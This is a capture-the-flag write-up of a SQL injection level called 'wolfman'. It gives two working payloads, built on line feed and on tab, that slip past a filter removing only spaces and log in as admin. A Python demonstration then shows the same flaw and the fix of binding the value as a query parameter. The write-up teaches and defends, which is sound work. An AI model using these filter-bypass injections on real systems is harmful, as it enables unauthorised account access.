wolfman

1

We are provided with the SQL query:

SELECT id FROM prob_wolfman WHERE id='guest' AND pw='{$_GET[pw]}'

This level prints the flag if the returned id is admin.

However, it also removes all space characters. To get around this, we can separate the SQL keywords with the Line Feed (%0A) character instead, which the database still treats as whitespace.

If we provide the following URI parameter:

?pw='%0AOR%0Aid='admin

The resultant query becomes:

SELECT id FROM prob_wolfman WHERE id='guest' AND pw=''
OR
id='admin'

2

We can also solve the challenge by using the Tab (%09) character.

If we provide the following URI parameter:

?pw='%09OR%09id='admin

The resultant query becomes:

SELECT id FROM prob_wolfman WHERE id='guest' AND pw=''  OR  id='admin'
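
Why both payloads above get past the space filter, and what closes the hole, shown as an added example that is not part of the original write-up. It assumes an in-memory SQLite table with constructed rows standing in for the challenge database; the function names are hypothetical.

```python
import sqlite3
from urllib.parse import unquote


def make_db():
    # Constructed stand-in for the challenge table (rows are made up).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE prob_wolfman (id TEXT, pw TEXT)")
    db.executemany(
        "INSERT INTO prob_wolfman VALUES (?, ?)",
        [("guest", "guest-pw"), ("admin", "admin-pw")],
    )
    return db


def strip_spaces(pw):
    # The filter as the page describes it: only the space character is removed.
    # Line feed and tab pass through, and the SQL tokenizer treats them as whitespace.
    return pw.replace(" ", "")


def lookup_concat(db, raw_pw):
    # Vulnerable form: filtered input is pasted into the query text,
    # so a quote in the input ends the string literal and the rest is parsed as SQL.
    pw = strip_spaces(unquote(raw_pw))
    query = f"SELECT id FROM prob_wolfman WHERE id='guest' AND pw='{pw}'"
    return [row[0] for row in db.execute(query).fetchall()]


def lookup_bound(db, raw_pw):
    # Hardened form: the value is bound as a parameter, so quotes and any
    # kind of whitespace stay inside the pw value and never reach the parser.
    pw = unquote(raw_pw)
    rows = db.execute(
        "SELECT id FROM prob_wolfman WHERE id='guest' AND pw=?", (pw,)
    )
    return [row[0] for row in rows.fetchall()]


if __name__ == "__main__":
    db = make_db()
    for payload in ("'%0AOR%0Aid='admin", "'%09OR%09id='admin", "guest-pw"):
        print(repr(payload), lookup_concat(db, payload), lookup_bound(db, payload))
```

With the concatenated query both payloads return the admin row; with the bound parameter they return nothing, while the legitimate guest password still matches.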

3